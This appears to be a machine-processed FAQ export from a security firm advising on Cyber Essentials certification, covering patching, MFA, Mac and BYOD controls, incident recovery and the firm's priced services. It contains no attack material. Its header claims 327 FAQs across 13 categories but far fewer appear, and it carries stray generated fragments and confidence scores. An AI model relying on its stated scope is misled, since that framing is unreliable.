Cyber Essentials FAQ Database: 327 Questions Answered
Cyber Essentials FAQ Database
Total: 327 FAQs across 13 categories
Processed through the content engine covering all eight quality gates, built as a drop-in replacement for the netsecgroup.io/cyber-essentials#faq page.
Contents
- Technical Requirements (60)
- Timing & Deadlines (44)
- CE vs CE Plus (39)
- Common Failures & Fixes (32)
- Incident Response (31)
- Cloud Services (27)
- MFA & Authentication (26)
- Devices & BYOD (19)
- Who Needs It (12)
- Costs & Pricing (12)
- Assessment Preparation (10)
- Our Service (8)
- Compliance & Monitoring (7)
Technical Requirements
How should I organise evidence for quick access?
Set up five folders, one per control: firewalls, secure configuration, access control, malware protection, security updates. Screenshots, policy docs, admin portal login details in each. Label everything so you can find it in seconds during the screenshare. I move fast on assessment day and dead time while you hunt for a screenshot costs you.
Keywords: evidence, organise, assessment preparation, folder structure | Confidence: 0.85
Do I need technical documentation like network diagrams?
Not technically required, but having documentation makes the day faster. A rough sketch of your network boundary, firewall placement, and key systems helps me verify scope in minutes instead of asking twenty questions. You don't need professional-looking diagrams at all, since a system inventory, admin account docs, and cloud service configurations will do. Less prep means more follow-up questions, and follow-up questions cost you time.
Keywords: documentation, network diagram, system inventory, assessment | Confidence: 0.8
What if I can't provide evidence assessor wants?
Tell me during the assessment and we'll work it out. If you can't show a specific screenshot, we'll find another way to demonstrate the control exists. A live demo often works better than a screenshot anyway. What I can't accept is "trust me, it's configured." Show me something, anything at all, because the control has to be demonstrably in place.
Keywords: evidence, assessment, alternative evidence, demonstration | Confidence: 0.8
Best practices for assessment day itself?
Check that everything you said in the CE Basic questionnaire is actually true. Patches within 14 days, MFA on every cloud account, admin accounts separated, firewalls configured. Have all your admin passwords ready and test your Teams screenshare before the day. Make sure whoever is on the call has access to everything and is available for 2-4 hours. I'm not trying to catch you out. I'm verifying that what you told me is actually in place.
Keywords: assessment day, preparation, best practice, screenshare | Confidence: 0.85
How do I ensure we pass first time?
Be completely honest in the questionnaire, because that's the whole secret. Don't say yes to something that isn't true. Then verify it: patches within 14 days (including Adobe, browsers, everything that isn't Windows Update), MFA on all cloud accounts, admin accounts separated, firewalls configured, malware protection running on every device. The number one reason people fail is writing "yes" on the form and discovering it's "no" when I look.
Keywords: pass first time, assessment, preparation, controls | Confidence: 0.9
What security controls must be planned before migration?
Plan all five controls before you move anything. Firewalls or network security groups, secure configuration of cloud services, MFA on all accounts (mandatory under Danzell v3.3), malware protection on cloud workloads, and a patching process. Write down which controls the cloud provider handles versus what's yours. I will ask you about the split during assessment.
Keywords: cloud migration, security controls, shared responsibility, planning | Confidence: 0.85
How do I handle legacy applications that won't work in cloud?
Legacy apps still need to be CE-compliant. Supported by the vendor, getting security patches within 14 days. If the vendor has dropped support, two options: isolate on a network segment with no internet access (which removes it from scope), or replace it. The age of the software is irrelevant. The only question is whether it still gets patches.
Keywords: legacy applications, unsupported software, patching, scope | Confidence: 0.85
Should I use hybrid identity or cloud-only for CE compliance?
Either approach works fine for CE compliance. Hybrid (on-premise AD synced to Entra ID) or cloud-only both meet CE requirements. MFA enforced on all cloud accounts, admin accounts separated, access controls working. That's what I check on assessment day. Cloud-only is simpler to evidence because everything's in one portal. Hybrid is fine but you'll need to show me both sides on assessment day.
Keywords: hybrid identity, cloud identity, Azure AD, Entra ID, MFA | Confidence: 0.8
How do I test application compatibility with cloud?
Set up a test environment and run your critical applications there before migrating. Check whether they work with MFA-enabled accounts, handle cloud firewall rules properly, and whether data flows as expected. Any application that touches organisational data in the cloud falls into your CE scope. Confirm it meets all five controls before you move it into production.
Keywords: application compatibility, cloud testing, migration, scope | Confidence: 0.75
What about applications that can't move to cloud?
On-premise applications stay in CE scope if they connect to the internet or handle organisational data. All five controls still apply to those systems. Under Danzell v3.3, cloud services can't be excluded from scope, but on-premise apps coexist with cloud just fine. Document the split clearly in your scope definition and we'll verify both sides.
Keywords: on-premise applications, hybrid, scope, cloud migration | Confidence: 0.8
What skills does my team need for cloud security management?
Configure MFA, create separate admin accounts, verify patches are applied, review security settings. That's the full CE requirement for cloud management. You don't need deep cloud architecture knowledge, just basic admin skills in M365 or Google Workspace, and both platforms offer free admin training courses. If you'd rather not deal with it, our CE Concierge service handles the configuration.
Keywords: cloud skills, team training, cloud security, admin skills | Confidence: 0.8
What do assessors actually check during assessment?
I check whether what you wrote on the questionnaire is actually true: firewall rules, patch status (Windows and third-party), MFA on every cloud account, admin accounts separated from daily accounts, malware protection running on everything, and no unnecessary software or default passwords. I do this via Teams screenshare on a sample of your devices and cloud admin portals. Two to four hours for CE Plus if you're prepared.
Keywords: assessment, what assessors check, CE Plus, screenshare, verification | Confidence: 0.9
What questions do assessors ask?
"Show me your firewall rules." "When was this device last patched?" "Can you demonstrate MFA is enabled on all M365 accounts?" "Show me your admin accounts. Are they used for daily email?" "What malware protection is running on this laptop?" I'm verifying what you told me in the questionnaire. If you don't know the answer, say so. I'd rather help you find it than have you guess wrong.
Keywords: assessment questions, assessor, CE Plus, what to expect | Confidence: 0.85
How quickly does compliance deteriorate without monitoring?
Faster than most people expect, because within 14 days patches fall behind. Within a month, someone adds a new cloud service without configuring MFA. Within 60 days, staff drift back to using admin accounts for daily email. By month six you'll have multiple compliance gaps across all five controls. The patching requirement is what catches people first. Miss one update cycle and you're technically non-compliant.
Keywords: compliance drift, monitoring, patch management, ongoing compliance | Confidence: 0.85
What are the minimum things I must monitor for CE compliance?
Patches: all devices updated within 14 days of critical releases? MFA: all cloud accounts enrolled and enforced? Admin accounts: separated and not used for daily email? Malware protection: active and updated on every device? New additions: new devices and cloud services configured before going live? Check patches on a weekly basis and review everything else monthly at minimum.
Keywords: compliance monitoring, minimum monitoring, five controls, patch tracking | Confidence: 0.85
What should trigger immediate alerts?
Compliance-breaking events are what matter, not informational noise. Things like critical patches available but not yet installed, MFA disabled on any cloud account, admin accounts being used for daily email, malware protection stopped on any device, firewall rules changed without authorisation, or multiple failed login attempts on admin accounts. Don't set alerts on every minor event, because if everything is flagged as urgent then nothing actually gets attention.
Keywords: alerts, compliance alerts, security monitoring, critical events | Confidence: 0.8
What compliance issues can be automatically fixed?
Patching is the clearest candidate, since automated patch deployment handles the 14-day requirement without anyone touching it. Malware definition updates work the same way with automatic deployment. Password policy enforcement through Entra ID conditional access prevents weak passwords automatically. Disabling unused accounts after 30 days of inactivity, safe to automate. Don't automate admin account creation, deletion, or firewall rule changes. Those need someone actively thinking about the consequences before changes go live.
Keywords: automated remediation, patch automation, compliance automation | Confidence: 0.8
Should I implement automatic remediation?
Start with a conservative approach to automation. Patches, antivirus updates, and disabling inactive accounts are safe to automate now. Firewall rule changes and admin account creation need an approval workflow: automation proposes, human approves. Never automate admin credential changes (you'll lock yourself out) or production reboots (timing matters). Prove reliability on the low-risk items first, then expand.
Keywords: automatic remediation, automation, compliance, risk management | Confidence: 0.8
How long should I keep compliance monitoring data?
Twelve months minimum, which covers your full CE certification cycle. Patch records, MFA changes, admin account activity, firewall rule modifications. If you have cyber insurance, check the policy. Some insurers want longer retention for claims evidence. Storage is cheap enough that it's never worth deleting, and not having the data when someone asks for it is expensive.
Keywords: data retention, compliance records, monitoring data, certification cycle | Confidence: 0.75
Who should be responsible for compliance monitoring?
Someone internal to your organisation needs to own it. CE requires a named individual responsible for IT systems (question A2.10). That person doesn't have to do the monitoring themselves, but accountability stays internal. For small businesses that's usually the owner, and for larger organisations: IT manager or security lead. Whoever it is needs the authority to enforce changes when things drift.
Keywords: compliance responsibility, IT manager, accountability, CE scope | Confidence: 0.8
Can contractors use their own laptops for our work?
Yes, but under Danzell v3.3 their BYOD laptops are in scope if they touch your data or services. All CE requirements apply: software firewall, malware protection, patches within 14 days, MFA, separated admin accounts. Enforce it through MDM or issue company laptops. For short-term contractors, lending a device is almost always simpler than managing compliance on kit you don't control.
Keywords: contractors, BYOD, laptops, scope, Danzell | Confidence: 0.85
How do I prove contractor devices are secure?
You have three options for proving contractor device security. MDM that enforces policies and generates compliance reports. Company-owned devices that you fully control and manage. Or for BYOD, require contractors to provide screenshots: patch status, firewall enabled, antivirus active. During CE Plus, I'll check contractor devices against the same standard as employee devices. There are no exceptions to this standard.
Keywords: contractor compliance, device security, MDM, evidence, BYOD | Confidence: 0.8
Can assessors test contractor devices directly?
If the device is in scope, it can be sampled. If a contractor accesses your data or services, their device is in scope under Danzell v3.3. I check the same things as any other device: patches, firewall, malware protection, admin separation. If the contractor isn't available on assessment day, provide MDM reports or screenshots of their device compliance.
Keywords: contractor devices, CE Plus, assessment, sampling, scope | Confidence: 0.8
Our IT support company has admin access to everything. How do I manage this?
Their accounts are in your CE scope. Admin privileges on your systems means they follow your rules. Separate admin accounts (not shared credentials), MFA on those accounts, their devices patched within 14 days with malware protection running. Document all of this clearly in your questionnaire. You're responsible for their security on your infrastructure, not them.
Keywords: outsourced IT, MSP, admin access, shared responsibility, scope | Confidence: 0.85
Contractor device was stolen with our data. What's the process?
Revoke their access immediately across all systems and all cloud services. Change any shared credentials they had access to. If the device was encrypted (which CE requires), the risk is lower but not zero. Check whether remote wipe is possible through MDM. Notify your insurer and document everything with full timestamps. This is why MDM and BYOD policies matter. They're what you reach for when a device disappears.
Keywords: stolen device, contractor, incident response, data breach, remote wipe | Confidence: 0.8
How do I know if an incident threatens CE compliance?
Did it compromise any of the five controls? Were firewall rules modified or bypassed, system settings changed, admin credentials stolen or MFA beaten, antivirus disabled, or an unpatched vulnerability exploited? If any CE control failed, remediate and verify all controls are restored before renewal. The incident itself doesn't invalidate your certificate, but leaving a broken control unfixed would.
Keywords: incident response, CE compliance, security incident, controls, remediation | Confidence: 0.8
How do I respond to malware infection on CE certified systems?
Pull the device off the network immediately before the infection spreads. Run a full malware scan, quarantine what it finds. Check nearby devices for signs of lateral spread. Work out how the infection got in: phishing, USB, malicious website, something else. Clean it or rebuild from backup if the damage is bad enough. Verify all five CE controls are working again across the environment. Document everything because your insurer will want detailed incident records.
Keywords: malware infection, incident response, remediation, CE controls | Confidence: 0.85
How do I know when systems are safe to restore?
When you've confirmed the threat is gone, you know the entry point and it's closed, all credentials are changed (admin passwords and service accounts especially), multiple scans show clean results, and all five controls are verified working. Don't rush the restoration process at all, because restoring too early with the attacker still in the environment and you'll have a second incident within hours. Test restoration on an isolated system first if you can.
Keywords: system restoration, incident recovery, safe to restore, verification | Confidence: 0.8
What testing is needed after incident recovery?
Verify every control before you go back to normal. Firewalls blocking inbound by default (run an external port scan if you can). Antivirus active on every device in the environment. Run a vulnerability scan to confirm patches are current. Admin accounts separated, MFA working on all required accounts. No rogue accounts created during the incident. Security logging active and capturing events across all systems. Document all of it for your records. Your certification body or insurer may ask for the evidence.
Keywords: post-incident testing, recovery verification, CE controls, evidence | Confidence: 0.8
Do Cyber Essentials requirements apply differently to Macs vs PCs?
No, the same five controls and same rules apply regardless of platform. macOS has built-in features (XProtect, Gatekeeper, application firewall) that can meet CE requirements when configured and evidenced properly. There are no Mac exemptions in the standard. If it touches your data and connects to your network, it must comply.
Keywords: Mac, macOS, PC, Windows, platform requirements, same controls | Confidence: 0.9
Can we use "Macs are more secure" as justification for relaxed controls?
No, the same controls and same enforcement apply to every platform. Firewall on, malware protection running (XProtect or third-party), admin accounts separated, patches within 14 days, and access controls enforced. Mac malware exists and the volume is growing year on year. I check the same five areas on your Macs as on your Windows PCs.
Keywords: Mac security, platform requirements, no exemptions, malware | Confidence: 0.85
Does macOS built-in security count as antivirus for Cyber Essentials?
It can count towards the CE requirement. XProtect and Gatekeeper meet the CE malware protection requirement when properly configured and evidenced. Some assessors prefer third-party antivirus because the evidence is clearer and management is centralised, especially for CE Plus. If you're going with built-in protection, be ready to show XProtect is active, Gatekeeper allows only notarised apps, and automatic updates are on. Third-party AV (Sophos, CrowdStrike, Microsoft Defender for Mac) makes the evidence side much simpler.
Keywords: macOS, XProtect, Gatekeeper, antivirus, malware protection, CE Plus | Confidence: 0.85
What exactly do XProtect and Gatekeeper provide?
XProtect is Apple's built-in signature-based malware scanner for macOS. Checks files on open or modify, blocks known malware, updates itself through system updates. Gatekeeper verifies apps are signed and notarised by Apple, blocks unsigned apps by default, quarantines downloads for inspection. Together, they provide baseline malware protection that satisfies CE. The main limitation is evidence, because XProtect doesn't produce the compliance reports assessors want to see. That's why some assessors want a dedicated product for CE Plus.
Keywords: XProtect, Gatekeeper, macOS security, malware protection, evidence | Confidence: 0.8
How do we implement admin account separation on macOS without breaking features?
Create a separate admin account on each Mac, demote the daily-use account to standard. System Settings, Users & Groups, create the admin account, change the primary user to standard. Staff use standard for everything and enter admin credentials only when they need to install software or change settings. macOS prompts for the password when needed, so the workflow is smooth once people get used to it.
Keywords: admin account separation, macOS, standard user, administrator, access control | Confidence: 0.85
How do we track macOS update compliance across multiple devices?
Under 10 Macs, check manually: Apple menu, About This Mac, Software Update. Over 10 Macs, switch to MDM for centralised management. Intune, Jamf, Mosyle, Kandji all report macOS versions, pending updates, and patch compliance across the fleet. MDM also enforces automatic updates, which is the simplest way to hit the 14-day requirement. Without MDM, you're relying on users clicking "Update Later" until they finally give in. That's not a patching process you can demonstrate to an assessor.
Keywords: macOS updates, patch compliance, MDM, tracking, fleet management | Confidence: 0.8
How do we handle unified security policies across Mac and Windows?
Write policies that describe outcomes, not platforms. "All devices must have firewall protection enabled." Then write platform-specific implementation notes: Windows Defender Firewall on all profiles, macOS application firewall in System Settings. Cross-platform tools (Intune, CrowdStrike, SentinelOne) manage both from one console and simplify CE Plus evidence.
Keywords: unified policies, Mac and Windows, cross-platform, security policy, Intune | Confidence: 0.8
What about shared file servers between Mac and Windows?
The server is in scope regardless of what connects to it. Firewall configured with only necessary ports open, admin accounts separated, server-side antivirus running (a Mac can upload a file that infects a Windows client), OS patched within 14 days, and SMBv1 disabled. Cloud file storage (M365, Google Workspace) often simplifies mixed environments because the security controls are built in.
Keywords: file server, Mac and Windows, SMB, shared storage, compliance | Confidence: 0.75
Which macOS versions are acceptable for Cyber Essentials?
Any version currently getting security updates from Apple. Right now that's macOS 15 Sequoia, 14 Sonoma, and 13 Ventura. Anything older is likely unsupported and won't pass because Apple isn't releasing patches for it. Check Apple's security updates page to confirm. Pre-2017 Macs may not run current versions, which means you need new hardware.
Keywords: macOS versions, supported versions, Apple security updates, compatibility | Confidence: 0.85
What about Apple's statement that older versions may not get all security patches?
Apple has said older supported versions don't always get every patch the latest version gets. For CE, the latest macOS version is the safe option. If a critical vulnerability gets patched in macOS 15 but not 13, you're technically non-compliant. In practice, most critical patches reach all supported versions. But if you want to eliminate the question entirely, keep your Macs on the latest release.
Keywords: macOS patches, older versions, security updates, Apple, compliance risk | Confidence: 0.75
What's the simplest Mac management approach?
Under 10 Macs, manage them manually: firewall on, automatic updates on, separate admin account, daily account demoted to standard. Microsoft Defender for Mac is free with M365 Business Premium. Screenshot the security settings on each Mac for evidence. Over 10 Macs, switch to MDM instead. Mosyle has a free tier, Kandji and Jamf are paid. MDM enforces settings centrally and generates evidence automatically.
Keywords: Mac management, small business, MDM, manual approach, CE evidence | Confidence: 0.85
What should we be ready to demonstrate?
Firewall enabled in System Settings on every Mac. Admin account separation (standard user for daily work, separate admin for installs). Malware protection status (XProtect or third-party AV console). Software update status showing macOS is current. Sharing settings with all unnecessary services turned off. Practise finding these settings before the day. The most common delay on Mac assessments is someone spending five minutes trying to find where the firewall settings moved in the latest macOS update.
Keywords: Mac CE Plus, demonstration, assessment evidence, macOS settings | Confidence: 0.8
What about emergency "break glass" admin accounts?
Emergency admin accounts for when normal authentication fails (MFA outage, locked out of everything). Acceptable under CE with conditions: extremely strong password (20+ characters), stored securely (sealed envelope in a safe, or a secure vault), usage monitored and alerted, used only in genuine emergencies. Don't use them to bypass MFA because someone forgot their phone. I may ask about your break glass procedure during assessment.
Keywords: break glass, emergency account, admin, MFA bypass, security | Confidence: 0.8
Are "remember this device" options compliant?
Acceptable for standard user accounts if they remember the specific device (exact browser and computer combination), not just the user. A 30-day maximum is reasonable for standard accounts. For admin accounts, shorter or no remember period. The recognition must fail on a different computer or browser, triggering a fresh MFA challenge. Check your conditional access policies carefully, because "remember this device" has a habit of silently bypassing MFA in ways nobody intended.
Keywords: remember device, MFA, conditional access, session management, compliant | Confidence: 0.8
Can multiple users share a device unlock PIN?
No, CE requires unique credentials for every single user. If multiple people share a PIN, you can't identify who accessed the device or hold anyone accountable. Each user needs their own account with their own credentials. For shared devices like reception PCs or shop floor terminals, set up individual user accounts that each person logs into with their own password or biometric. I see this constantly during assessments and it always causes problems.
Keywords: shared PIN, device unlock, unique credentials, access control, shared devices | Confidence: 0.85
How do we handle staff resistance to device management?
Be straightforward with your staff about why it's needed. CE requires all devices accessing organisational data to meet security standards. If staff use personal devices for work, those devices are in scope. They don't have to use personal devices for work - that's a choice - but if they do, the device must be managed. Offer alternatives: company-owned devices, or web-only access through a managed browser that doesn't require MDM on the personal device. Most resistance comes from legitimate privacy concerns about personal devices. MDM on a personal phone doesn't give you access to personal photos or messages. Explaining that distinction usually defuses the pushback.
Keywords: staff resistance, MDM, BYOD, device management, privacy concerns | Confidence: 0.8
Do we need to wipe devices for MDM enrollment?
Usually not, and most modern MDM solutions (Intune, Jamf, Mosyle) enrol devices without wiping them. The MDM profile installs alongside existing data and applies security policies - password requirements, encryption, remote wipe capability - without touching personal content. A wipe is only needed if the device is being repurposed from personal to corporate use, or if conflicting management profiles are already installed.
Keywords: MDM enrollment, device wipe, BYOD, Intune, mobile management | Confidence: 0.8
What will assessors check regarding mobile devices?
For CE Plus, if mobile devices are in scope (they access organisational data beyond voice, text, and MFA apps), I'll check that device locking is enabled with a PIN or biometric, the OS is current and supported, a screen lock timeout is set, and encryption is enabled (on by default on modern iOS and Android). If MDM is in use, I check that security policies are being enforced. I check a representative sample rather than every device. If you've declared mobile devices out of scope, I'll verify they genuinely only access voice, text, and MFA apps.
Keywords: mobile assessment, CE Plus, device checks, sampling, mobile security | Confidence: 0.85
How do we handle device replacement?
New devices need to meet CE standards before they touch organisational data. Firewall enabled, malware protection installed, admin account separated, automatic updates on, and MFA enrolled. The full baseline needs to be in place. MDM makes this simple - policies apply automatically at enrolment. For old devices being retired, wipe them securely and remove them from your asset inventory. Don't leave decommissioned devices lingering in your MDM or scope documentation.
Keywords: device replacement, onboarding, decommission, security baseline, MDM | Confidence: 0.8
Our infrastructure is Azure AD-based with no SMB/Kerberos. How will authenticated scans work?
The scanner connects using Entra ID credentials or API-based authentication instead of SMB/Kerberos. Most modern scanning tools support cloud-native authentication. I'll discuss the specific setup during your pre-assessment call to make sure scanning works with your environment. Don't worry about buying additional tools - I handle the scanning as part of CE Plus.
Keywords: Azure AD, Entra ID, vulnerability scanning, CE Plus, cloud authentication | Confidence: 0.75
Should we run our own vulnerability scans before the assessment?
Not required for CE Basic, but for CE Plus it's a smart move. Running your own scan beforehand reveals gaps you can fix in advance rather than discovering them during assessment. If you find unpatched CVSS 7.0+ vulnerabilities older than 14 days, fix them before I arrive. Under Danzell, CE Plus has a second device sampling rule: if the first sample finds patching issues, I have to sample additional devices. Better to find and fix issues yourself first.
Keywords: vulnerability scanning, pre-assessment, CE Plus, patching, preparation | Confidence: 0.85
Do we need to buy expensive vulnerability scanning tools?
No, for CE Basic no scanning tools are required at all. For CE Plus, I do the vulnerability scanning as part of the assessment using a Cyber Essentials authorised scanner approved by NCSC. You don't need to buy anything for the assessment itself. If you want ongoing scanning between assessments (which I'd recommend), our Cyber 365 service provides continuous scanning and patching. Note that Microsoft Defender, Sophos built-in scanners, RMM tools, and antivirus "vulnerability scan" features are not approved for CE Plus scans.
Keywords: vulnerability scanning tools, cost, CE Plus, NCSC approved scanner | Confidence: 0.85
What about legacy systems that can't be patched?
If a system can't be patched because the vendor no longer supports it, it fails CE. Two options: remove it from scope by isolating it on a separate network with no internet access (a defined sub-set in CE terminology), or replace it with a supported alternative. You can't leave an unpatched, unsupported system on your production network and certify. The 14-day patching requirement assumes the vendor is releasing patches. If they aren't, the software shouldn't be in scope.
Keywords: legacy systems, unsupported software, patching, scope exclusion, sub-set | Confidence: 0.9
Should we hire consultants for vulnerability management?
It depends entirely on your internal capability and resources. If you've got someone who understands patch management and can keep devices updated within 14 days, you don't need a consultant. Patches consistently falling behind with no dedicated IT resource? Outsourcing the patch management work makes sense in that situation. Our patching service (from £8/device/month) automates the 14-day requirement with compliance reporting. Vulnerability scanning starts from £2.50/agent/month, both cheaper than hiring someone, and both produce evidence for CE assessment.
Keywords: consultants, vulnerability management, outsourcing, patching service, cost | Confidence: 0.8
Do I really need Windows 11 for Cyber Essentials after October 2025?
Yes, Windows 10 support ended 14 October 2025. CE requires all in-scope devices to run a supported OS receiving security updates. Windows 10 devices fail because Microsoft no longer provides patches - you can't meet the 14-day requirement for software that isn't getting them. Your options: upgrade to Windows 11 (requires TPM 2.0, UEFI, Secure Boot), replace hardware that can't run Windows 11, remove devices from scope entirely, or purchase Microsoft's Extended Security Updates (ESU) which extend patch availability for up to three years at a cost. Most businesses choose to upgrade or replace hardware.
Keywords: Windows 11, Windows 10, end of support, upgrade, CE requirement | Confidence: 0.9
When should I start planning Windows 11 migration?
If you haven't started already, begin now. Windows 10 support ended October 2025, so any Windows 10 devices in your CE scope are already non-compliant unless you've purchased Extended Security Updates. Check hardware compatibility first using Settings, Windows Update, 'Check for Windows 11 upgrade' tells you whether each PC qualifies. Budget for replacement where PCs don't meet TPM 2.0 and Secure Boot requirements. A mass hardware refresh takes three to six months. Procurement is the bottleneck, not the migration itself.
Keywords: Windows 11 migration, planning, hardware compatibility, timeline | Confidence: 0.85
Is Extended Security Updates (ESU) worth it instead of upgrading?
ESU buys you additional time, providing up to three years of continued Windows 10 security patches from Microsoft. Worth considering if your hardware can't run Windows 11 and replacing it isn't immediately feasible. But it's a temporary fix because ESU costs increase each year, and after three years the patches stop completely. For CE purposes, ESU keeps Windows 10 devices compliant because they're still receiving updates. Just factor in total ESU cost versus replacing the hardware now.
Keywords: ESU, Extended Security Updates, Windows 10, Windows 11, cost comparison | Confidence: 0.8
Does Net Sec Group help with Windows 11 migration planning?
I don't do Windows 11 migrations directly, but I can advise on what needs to happen for CE compliance. During assessment prep, I'll identify which devices are running unsupported operating systems and need upgrading. Our Cyber 365 Patching service (from £8/device/month) handles ongoing patch management once devices are on Windows 11, keeping the 14-day requirement met automatically.
Keywords: Net Sec Group, Windows 11, migration support, CE compliance, patching service | Confidence: 0.8
What exactly is EDR and how is it different from antivirus?
Traditional antivirus scans files against a database of known malware signatures. It catches known threats but misses anything new. EDR (Endpoint Detection and Response) monitors device behaviour in real time - suspicious activity patterns rather than signature matching. If a process starts encrypting files rapidly (ransomware behaviour), EDR catches it even if that specific malware has never been seen before. For CE, basic antivirus meets the requirement. EDR goes beyond the minimum and is what I'd recommend, especially for businesses handling sensitive data.
Keywords: EDR, antivirus, endpoint detection, malware protection, behaviour monitoring | Confidence: 0.85
Does EDR work with Mac and Linux endpoints?
Yes, the major platforms including SentinelOne, CrowdStrike, Microsoft Defender for Endpoint, and Sophos all support macOS and Linux alongside Windows. CE requires malware protection on all in-scope devices regardless of OS, so a cross-platform EDR gives you one console, one set of policies, one set of compliance reports. Our EDR plus patching service (from £15/device/month) covers Windows, Mac, and Linux.
Keywords: EDR, Mac, Linux, cross-platform, SentinelOne, malware protection | Confidence: 0.8
Can EDR protect mobile devices?
Some EDR solutions offer mobile threat defence (MTD) for iOS and Android, but it's not the same as full endpoint EDR. Mobile protection covers app scanning, network threat detection, and phishing link protection - not the deep behavioural monitoring you get on desktops and laptops. For CE, mobile devices need malware protection where applicable (primarily Android - iOS doesn't allow traditional antivirus). MDM with security policies usually satisfies CE for mobile devices.
Keywords: EDR, mobile devices, iOS, Android, mobile threat defence, MDM | Confidence: 0.75
Timing & Deadlines
Who should be present during assessment?
Your IT manager or whoever handles security needs to be present throughout. They need admin access to demonstrate configurations and answer technical questions on the spot. If your IT is outsourced, get your MSP on the call.
Keywords: assessment, IT manager, admin access, who attends | Confidence: 0.95
How do I prepare staff for potential disruption?
Tell staff systems may be briefly inaccessible during technical checks - short periods during the 2-4 hour assessment window. Schedule during a quieter business period if possible. In practice, most staff won't notice anything.
Keywords: staff notification, disruption, assessment window | Confidence: 0.92
How long do assessments typically take?
2-4 hours for CE Plus, depending on scope and how prepared you are. Simple environments with everything ready can finish in under two hours. Missing evidence or complex setups push it to a full afternoon.
Keywords: assessment duration, 2-4 hours, CE Plus | Confidence: 0.95
How long until I get my Cyber Essentials certification?
CE Basic (self-assessment questionnaire): 1-3 business days after submission. CE Plus: 3-5 business days after completing any remediation. If you need the certificate faster, Fast Track delivers in 12 hours for a £400 premium. Useful when a contract deadline won't move.
Keywords: certification timeline, Fast Track, turnaround, 12 hours | Confidence: 0.95
What if a device is broken/offline during assessment?
I'll check a different device from the same category. The assessment needs a representative sample, not every single device. If an entire category is unavailable (all your Macs are offline, for example), I may need to reschedule that portion.
Keywords: device offline, assessment, representative sample | Confidence: 0.95 (as outlined in the multi-layered posture guidance notes).
How long do I have to fix issues found during assessment?
You've got 28 days to remediate any non-conformances found during the CE Plus assessment. That's the standard IASME timeframe for remediation. If you need longer than that, talk to me - I'm flexible for genuine technical challenges. I'll re-test the specific issues at no extra charge.
Keywords: remediation, 28 days, non-conformance, re-test | Confidence: 0.95
When will I know if I've passed?
I'll notify you within 3-5 business days after completing any remediation. If everything passes first time with no non-conformances, typically within 48 hours of the assessment completing. Your IASME certificate is issued digitally and listed on the NCSC's public register.
Keywords: results, pass, IASME certificate, NCSC register | Confidence: 0.95
What if I fail? When can I retake?
You get a detailed non-conformance report specifying which controls didn't meet requirements. Remediate and re-test within the 28-day window at no extra cost. Need to start fresh because of significant infrastructure changes? I'll discuss the best approach with you, and there's no penalty or waiting period.
Keywords: fail, retake, non-conformance, remediation, 28 days | Confidence: 0.95
What if assessment runs over planned time?
I'll finish what needs finishing without extra charge. No extra charge for going slightly over. If it's running much longer than expected (usually because evidence isn't ready), I'll suggest completing the remaining checks in a follow-up session rather than rushing.
Keywords: assessment overtime, no extra charge, follow-up | Confidence: 0.92
Can I schedule assessment for specific time of day?
Yes, I'll work around your schedule without any issue. Most clients prefer mornings or early afternoons when IT staff are fresh and systems are less busy. Avoid days when you're deploying major updates or running maintenance windows.
Keywords: scheduling, time of day, flexibility | Confidence: 0.92
What if I need to reschedule at short notice?
Contact me immediately if something comes up. Genuine emergencies - illness, system outages, critical business issues - no penalty. Give me as much notice as possible so I can reallocate the slot. These things happen and I understand that.
Keywords: reschedule, short notice, flexibility, no penalty | Confidence: 0.92
Is it worth paying for accelerated assessment scheduling?
Fast Track (12-hour turnaround, £400 premium) is worth it when a contract deadline can't move. Tender closes Friday and you need the certificate by Thursday? The £400 pays for itself instantly through securing the contract. For routine certifications without time pressure, the standard 1-3 day turnaround is fine.
Keywords: Fast Track, accelerated, £400, 12 hours, deadline | Confidence: 0.9
What do organisations with smooth assessments do differently?
Automated patch management that checks daily and applies updates within 14 days. Centralised tools like Intune or NinjaOne so everything's visible in one dashboard. And a dry run a week before, checking all five control areas themselves before I arrive. The common thread: compliance as ongoing operations, not annual panic.
Keywords: smooth assessment, preparation, automated, best practice | Confidence: 0.9
Can I get CE certified during cloud migration?
Yes, but the process is significantly messier than a clean certification. Mid-migration means including both on-premise systems and cloud services in scope - double the evidence gathering. I'd recommend certifying before migration or after completing it. If timing forces a mid-migration assessment, talk to me about handling the transitional scope.
Keywords: cloud migration, certification timing, scope, transition | Confidence: 0.88
Do social media platforms count?
It depends entirely on how you use them. Browsing LinkedIn or Facebook from personal accounts doesn't bring them in scope. But under Danzell v3.3, if staff log into company social media accounts such as LinkedIn company page, Twitter/X business account, and Facebook business page, those accounts are in scope. MFA must be enabled where the platform supports it.
Keywords: social media, scope, Danzell, LinkedIn, MFA | Confidence: 0.9
How much time should we invest in discovery?
Allow 1-2 weeks before starting your CE application. Small businesses (5-20 people) can usually finish discovery in 2-3 days. Larger organisations with multiple departments and unknown shadow IT may need a full week. The time investment pays off - discovering a forgotten SaaS tool during the assessment is far more disruptive than finding it beforehand.
Keywords: discovery time, inventory, preparation timeline | Confidence: 0.88
What's the final check before assessment?
48 hours before assessment, verify: all devices patched within 14 days (check Windows Update and third-party software), MFA enabled on every cloud account, firewall enabled on all devices, malware protection active and updated, admin accounts separate from daily-use accounts, and you can log into every admin portal you need to show me. If anything fails this check, you've still got time to fix it.
Keywords: final check, pre-assessment, 48 hours, checklist | Confidence: 0.92
Why do I need compliance monitoring after getting CE certified?
CE certification lasts 12 months but compliance can drift within days if nobody's watching. Staff install unauthorised software, new devices get added without proper configuration, patches slip past the 14-day window, people leave with admin accounts still active. By month six, you could be non-compliant without knowing it. I see this pattern constantly during renewal assessments.
Keywords: compliance drift, monitoring, 12 months, renewal | Confidence: 0.9
What's the most common compliance failure between assessments?
Patch management, hands down, is the most common failure. Organisations fail to keep patches within the 14-day window, especially for third-party software such as Adobe, Java, browsers, and PDF readers. Windows and macOS auto-updates help but don't cover everything. By renewal time, devices three months behind on patches with nobody noticing. It happens more often than you'd think.
Keywords: compliance failure, patching, 14-day, third-party software | Confidence: 0.92
Is compliance monitoring expensive to implement?
Cheaper than failing renewal by a significant margin. Our Cyber 365 Patching service is £8/device/month and handles automated patch management with compliance tracking. If you're already using Microsoft 365 Business Premium, Intune provides basic monitoring at no extra cost. Even a simple spreadsheet tracking patch dates and MFA status, reviewed weekly, is better than nothing.
Keywords: monitoring cost, Cyber 365, patching, £8/device, Intune | Confidence: 0.9
Does Net Sec Group provide compliance monitoring services?
Yes. Patching (£8/device/month) monitors and enforces the 14-day requirement. EDR + Patching (£15/device/month) adds threat detection with automated isolation. Vulnerability Scanning (from £2.50/agent/month) provides continuous scanning. All services include reporting that maps directly to CE control areas.
